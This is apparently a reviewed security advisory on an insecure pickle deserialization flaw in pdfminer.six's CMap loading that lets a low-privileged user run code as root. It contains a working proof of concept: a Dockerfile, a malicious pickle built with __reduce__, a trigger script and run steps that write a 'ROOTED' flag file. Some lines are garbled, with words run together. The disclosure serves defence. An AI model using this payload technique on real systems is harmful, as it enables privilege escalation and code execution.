This report demonstrates a real-world privilege escalation vulnerability in pdfminer.six due to unsafe usage of Python's pickle module for CMap file loading.
It shows how a low-privileged user can gain root access (or escalate to any service account) by exploiting insecure deserialization in a typical multi-user or server environment.
pdfminer.six is a popular Python library for extracting text and information from PDF files. It supports CJK (Chinese, Japanese, Korean) fonts via external CMap files, which it loads from disk using Python's pickle module.
Security Issue:
If the CMap search path (CMAP_PATHor default directories) includes a world-writable or user-writable directory, an attacker can place a malicious.pickle.gzfile that will be loaded and deserialized by pdfminer.six, leading to arbitrary code execution.
pdfminer/cmapdb.py).pickle.gz files using Python’s pickle module, which is unsafe for untrusted data.CMAP_PATH, they can execute code as the user running pdfminer—potentially root or a privileged service.Environment:
- Alpine Linux (Docker container)
- Two users:
- user1 (attacker: low-privilege)
- root (victim: runs privileged PDF-processing script)
- Shared writable directory: /tmp/uploads
- CMAP_PATH set to /tmp/uploads for the privileged script
- pdfminer.six installed system-wide
Attack Flow:
1. user1 creates a malicious CMap file (Evil.pickle.gz) in /tmp/uploads.
2. The privileged service (root) processes a PDF or calls get_cmap("Evil").
3. The malicious pickle is deserialized, running arbitrary code as root.
4. The exploit creates a flag file in /root/pwnedByPdfminer as proof.
pickleCMAP_PATHreturn type(str(name), (), pickle.loads(gzfile.read()))
In pdfminer/cmapdb.py's _load_data methodcreateEvilPickle.py, evilmod.py, and processPdf.pyExploit Chain:
- Attacker places a malicious .pickle.gz file in the CMap search path.
- Privileged process (e.g., root) loads a CMap, triggering pickle deserialization.
- Arbitrary code executes with the privilege of the process (root/service account).
FROM python:3.11-alpine
# Install required packages and create users
RUN adduser -D user1 && mkdir -p /tmp/uploads && chown user1:user1 /tmp/uploads
WORKDIR /app
# Install pdfminer.six
RUN pip install --no-cache-dir pdfminer.six
# Copy app files
COPY evilmod.py /app/evilmod.py
COPY createEvilPickle.py /app/createEvilPickle.py
COPY processPDF.py /app/processPDF.py
# Set up permissions for demo
RUN chmod 777 /tmp/uploads
# Default: drop into a shell for demo instructions
CMD ["/bin/sh"]
import os
def evilFunc():
with open("/root/pwnedByPdfminer", "w") as f:
f.write("ROOTED by pdfminer pickle RCE\n")
return {"CODE2CID": {}, "IS_VERTICAL": False}
import pickle
import gzip
from evilmod import evilFunc
class Evil:
def __reduce__(self):
return (evilFunc, ())
payload = pickle.dumps(Evil())
with gzip.open("/tmp/uploads/Evil.pickle.gz", "wb") as f:
f.write(payload)
print("Malicious pickle created at /tmp/uploads/Evil.pickle.gz")
import os
from pdfminer.cmapdb import CMapDB
os.environ["CMAP_PATH"] = "/tmp/uploads"
CMapDB.get_cmap("Evil")
print("CMap loaded. If vulnerable, /root/pwnedByPdfminer will be created.")
docker build -t pdfminer-priv-esc-demo .
docker run --rm -it --name pdfminer-demo pdfminer-priv-esc-demo
su user1
cd /app
python createEvilPickle.py
# Confirms: /tmp/uploads/Evil.pickle.gz is created and owned by user1
cd /app
python processPdf.py
# Output: If vulnerable, /root/pwnedByPdfminer will be created
cat /root/pwnedByPdfminer
# 🏴 Output: ROOTED by pdfminer pickle RCE
createEvilPickle.py to craft and place a malicious CMap pickle in a shared upload directory.OWASP Top 10:
MITRE ATT&CK Techniques:

{
"github_reviewed": true,
"cwe_ids": [
"CWE-502",
"CWE-915"
],
"github_reviewed_at": "2025-11-07T23:17:05Z",
"nvd_published_at": null,
"severity": "HIGH"
}